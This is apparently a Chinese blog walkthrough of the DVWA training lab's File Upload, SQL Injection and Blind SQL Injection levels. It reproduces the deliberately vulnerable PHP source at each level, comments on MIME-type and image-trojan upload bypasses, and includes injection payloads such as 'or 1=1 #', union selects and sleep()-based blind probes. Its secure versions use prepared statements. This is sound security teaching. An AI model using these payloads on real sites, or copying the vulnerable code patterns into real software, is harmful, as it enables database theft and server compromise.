安全 | Last Regrets

File Upload

DVWA File upload 过关秘籍. LOW 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // Can we move the file to the upload folder? 7 // 完全没做过滤. 8 // 上传一个PHP文件也是可以的. 9 if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 10 // No 11 echo '<pre>Your image was not uploaded.</pre>'; 12 } 13 else { 14 // Yes! 15 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 16 } 17} Medium 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // File information 7 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 8 $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 9 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 10 11 // Is it an image? 12 // // 开始做了一些过滤 13 14 // 下面是官方对$_FILES 函数的描述 15 // [name] => MyFile.txt (comes from the browser, so treat as tainted) 16 // [type] => text/plain (not sure where it gets this from - assume the browser, so treat as tainted) 17 // [tmp_name] => /tmp/php/php1h4j1o (could be anywhere on your system, depending on your config settings, but the user has no control, so this isn't tainted) 18 // [error] => UPLOAD_ERR_OK (= 0) 19 // [size] => 123 (the size in bytes) 20 21 // 其中对name和type的description的描述都是 `treat as tainted`(被污染的) 22 // 这意味着它有可能会被修改 unsafe 23 24 // 我们可以尝试上传一个PHP文件，使用一些拦截请求工具，修改即将发出的请求. 25 // 来达到修改`name`中的后缀名和`type`中的媒体类型. 26 if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 27 ( $uploaded_size < 100000 ) ) { 28 29 // Can we move the file to the upload folder? 30 if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 31 // No 32 echo '<pre>Your image was not uploaded.</pre>'; 33 } 34 else { 35 // Yes! 36 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 37 } 38 } 39 else { 40 // Invalid file 41 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 42 } 43} High 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // File information 7 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 8 // jpg 9 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 10 11 // file size 12 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 13 14 // tmp_name 是临时副本的名字 15 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 16 17 // Is it an image? 18 // 和上面的比起来多个一个文件后缀名的判断. 19 // strtolower 转小写 20 // 扩展名只要满足jpeg,png或者jpg就行 21 if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 22 ( $uploaded_size < 100000 ) && 23 // getimagesize 获取图像信息 24 // 这个函数保证你穿的一定得是个图像 25 // 可以用图片木马绕过 26 getimagesize( $uploaded_tmp ) ) { 27 28 // Can we move the file to the upload folder? 29 if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 30 // No 31 echo '<pre>Your image was not uploaded.</pre>'; 32 } 33 else { 34 // Yes! 35 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 36 } 37 } 38 else { 39 // Invalid file 40 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 41 } 42} High 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Where are we going to be writing to? 3 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 4 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 5 6 // File information 7 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 8 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 9 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 10 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 11 12 // Is it an image? 13 // 对比上面多验证了文件的后缀名 14 if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 15 ( $uploaded_size < 100000 ) && 16 17 18 19 // 函数会通过读取文件头，返回图片的长、宽等信息，如果没有相关的图片文件头，函数会报错 20 getimagesize( $uploaded_tmp ) ) { 21 22 // 可以看到，High级别的代码读取文件名中最后一个”.”后的字符串，期望通过文件名来限制文件类型 23 // 因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一 24 // 同时，getimagesize函数更是限制了上传文件的文件头必须为图像类型 25 26 // Can we move the file to the upload folder? 27 if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 28 // No 29 echo '<pre>Your image was not uploaded.</pre>'; 30 } 31 else { 32 // Yes! 33 echo "<pre>{$target_path} succesfully uploaded!</pre>"; 34 } 35 } 36 else { 37 // Invalid file 38 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 39 } 40} Impossible 1if( isset( $_POST[ 'Upload' ] ) ) { 2 // Check Anti-CSRF token 3 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 4 5 // File information 6 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 7 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 8 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 9 $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 10 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 11 12 // Where are we going to be writing to? 13 $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; 14 //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; 15 16 // MD5 加密 17 $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 18 $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); 19 $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 20 21 // Is it an image? 22 if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) && 23 ( $uploaded_size < 100000 ) && 24 ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && 25 getimagesize( $uploaded_tmp ) ) { 26 27 // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) 28 if( $uploaded_type == 'image/jpeg' ) { 29 $img = imagecreatefromjpeg( $uploaded_tmp ); 30 imagejpeg( $img, $temp_file, 100); 31 } 32 else { 33 $img = imagecreatefrompng( $uploaded_tmp ); 34 imagepng( $img, $temp_file, 9); 35 } 36 imagedestroy( $img ); 37 38 // Can we move the file to the web root from the temp folder? 39 if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { 40 // Yes! 41 echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; 42 } 43 else { 44 // No 45 echo '<pre>Your image was not uploaded.</pre>'; 46 } 47 48 // Delete any temp files 49 if( file_exists( $temp_file ) ) 50 unlink( $temp_file ); 51 } 52 else { 53 // Invalid file 54 echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 55 } 56} 57 58// Generate Anti-CSRF token 59generateSessionToken(); Extension 00%截断 ...

SQL Injection

DVWA SQL Injection 过关秘籍. LOW 1if( isset( $_REQUEST[ 'Submit' ] ) ) { 2 // Get input 3 $id = $_REQUEST[ 'id' ]; 4 5 // Check database 6 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 7 // 并没有做什么注入防护 8 // 尝试构造： 9 // select first_name, last_name from from users where user_id = '1' and 1=1; 10 // select first_name, last_name from from users where user_id = '1' and 1=2; 11 // select first_name, last_name from from users where user_id = '1' or 1=1; 12 13 $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); 14 15 // Get results 16 $num = mysql_numrows( $result ); 17 $i = 0; 18 while( $i < $num ) { 19 // Get values 20 $first = mysql_result( $result, $i, "first_name" ); 21 $last = mysql_result( $result, $i, "last_name" ); 22 23 // Feedback for end user 24 echo "<pre>ID: {$id} First name: {$first} Surname: {$last}</pre>"; 25 26 // Increase loop count 27 $i++; 28 } 29 30 mysql_close(); 31} Medium 1if( isset( $_POST[ 'Submit' ] ) ) { 2 // Get input 3 4 // 换成了Post 这也太普通了 5 // 使用一些网络请求工具照样改，比如BurpSuite，PostMan，curl. 6 $id = $_POST[ 'id' ]; 7 $id = mysql_real_escape_string( $id ); 8 // mysql_real_escape_string 可以对以下字符进行转义 9 // \x00, \n, \r, \, ', " 和 \x1a. 10 // 值得注意的是 mysql_real_escape_string 函数所在的MYSQL扩展在 11 // PHP 5.5.0 起已废弃，并在自 PHP 7.0.0 开始被移除。 12 13 // Check database 14 $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 15 // 尝试构造: 16 // SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1; 17 18 $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); 19 20 // Get results 21 $num = mysql_numrows( $result ); 22 $i = 0; 23 while( $i < $num ) { 24 // Display values 25 $first = mysql_result( $result, $i, "first_name" ); 26 $last = mysql_result( $result, $i, "last_name" ); 27 28 // Feedback for end user 29 echo "<pre>ID: {$id} First name: {$first} Surname: {$last}</pre>"; 30 31 // Increase loop count 32 $i++; 33 } 34 35 //mysql_close(); 36} High 1if( isset( $_SESSION [ 'id' ] ) ) { 2 // Get input 3 $id = $_SESSION[ 'id' ]; 4 5 // Check database 6 // 看起来做了返回条目限制 7 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 8 // 没什么套路 9 // SELECT first_name, last_name FROM users WHERE user_id = '1' or 1=1 # ' LIMIT 1; 10 11 $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' ); 12 13 // Get results 14 $num = mysql_numrows( $result ); 15 $i = 0; 16 while( $i < $num ) { 17 // Get values 18 $first = mysql_result( $result, $i, "first_name" ); 19 $last = mysql_result( $result, $i, "last_name" ); 20 21 // Feedback for end user 22 echo "<pre>ID: {$id} First name: {$first} Surname: {$last}</pre>"; 23 24 // Increase loop count 25 $i++; 26 } 27 28 mysql_close(); 29} impossible 1if( isset( $_GET[ 'Submit' ] ) ) { 2 // Check Anti-CSRF token 3 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 4 5 // Get input 6 $id = $_GET[ 'id' ]; 7 8 // Was a number entered? 9 if(is_numeric( $id )) { 10 // Check the database 11 // 这是！PDO! 12 // PDO 是一种PHP中比较先进的面向对象形式的数据库访问技术 13 // 不过即使是面向对象它还是事务脚本形式的。 14 // 提供了防SQL注入的功能。 15 $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 16 // 无法注入 17 18 $data->bindParam( ':id', $id, PDO::PARAM_INT ); 19 $data->execute(); 20 $row = $data->fetch(); 21 22 // Make sure only 1 result is returned 23 if( $data->rowCount() == 1 ) { 24 // Get values 25 $first = $row[ 'first_name' ]; 26 $last = $row[ 'last_name' ]; 27 28 // Feedback for end user 29 echo "<pre>ID: {$id} First name: {$first} Surname: {$last}</pre>"; 30 } 31 } 32} 33 34// Generate Anti-CSRF tsoken 35generateSessionToken(); Extension 二次注入: ...

Sql Injection Blind

返回的结果集无法看到，只能通过一些页面显示或状态来判断。像瞎子一样。 DVWA SQL Injection blind 过关秘籍. Low 1if(isset( $_GET[ 'Submit' ])) { 2 // Get input 3 $id = $_GET[ 'id' ]; 4 5 // Check database 6 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 7 // 没有一点点防备 8 // 尝试构造: (由于看不到结果集，所以脱裤子的语句是无效) 9 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,2 # '; 10 // User ID exists in the database. <存在注入漏洞> 11 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length( database())=4,sleep(4),2) # '; 12 13 $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 14 15 // Get results 16 $num = @mysql_numrows( $result ); // The '@' character suppresses errors 17 if( $num > 0 ) { 18 // Feedback for end user 19 echo '<pre>User ID exists in the database.</pre>'; 20 } 21 else { 22 // User wasn't found, so the page wasn't! 23 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 24 25 // Feedback for end user 26 echo '<pre>User ID is MISSING from the database.</pre>'; 27 } 28 29 mysql_close(); 30} MIEDUM 1if( isset( $_POST[ 'Submit' ] ) ) { 2 // Get input 3 $id = $_POST[ 'id' ]; 4 $id = mysql_real_escape_string( $id ); 5 6 // Check database 7 $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 8 // 尝试构造: 9 // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,2; 10 // 以上判断存在注入漏洞 11 // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,if(length(database()) > 4, sleep(3), 2) 12 13 $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 14 15 // Get results 16 $num = @mysql_numrows( $result ); // The '@' character suppresses errors 17 if( $num > 0 ) { 18 // Feedback for end user 19 echo '<pre>User ID exists in the database.</pre>'; 20 } 21 else { 22 // Feedback for end user 23 echo '<pre>User ID is MISSING from the database.</pre>'; 24 } 25 26 //mysql_close(); 27} High 1if( isset( $_SESSION['id'])){ 2 // Get input 3 $id = $_SESSION[ 'id' ]; 4 5 // Check database 6 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 7 // 没有新花样，只限制输出条目是无法拦住我们的 8 // 尝试构造: 9 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length(database()) = 4, sleep(3), 2) # LIMIT 1; 10 $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' ); 11 12 // Get results 13 $num = mysql_numrows( $result ); 14 $i = 0; 15 while( $i < $num ) { 16 // Get values 17 $first = mysql_result( $result, $i, "first_name" ); 18 $last = mysql_result( $result, $i, "last_name" ); 19 20 // Feedback for end user 21 echo "<pre>ID: {$id} First name: {$first} Surname: {$last}</pre>"; 22 23 // Increase loop count 24 $i++; 25 } 26 27 mysql_close(); 28} High 1if( isset( $_GET[ 'Submit' ] ) ) { 2 // Check Anti-CSRF token 3 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 4 5 // Get input 6 $id = $_GET[ 'id' ]; 7 8 // Was a number entered? 9 if(is_numeric( $id )) { 10 // Check the database 11 // PDO 无法注入 12 $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 13 $data->bindParam( ':id', $id, PDO::PARAM_INT ); 14 $data->execute(); 15 16 // Get results 17 if( $data->rowCount() == 1 ) { 18 // Feedback for end user 19 echo '<pre>User ID exists in the database.</pre>'; 20 } 21 else { 22 // User wasn't found, so the page wasn't! 23 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 24 25 // Feedback for end user 26 echo '<pre>User ID is MISSING from the database.</pre>'; 27 } 28 } 29} 30 31// Generate Anti-CSRF token 32generateSessionToken();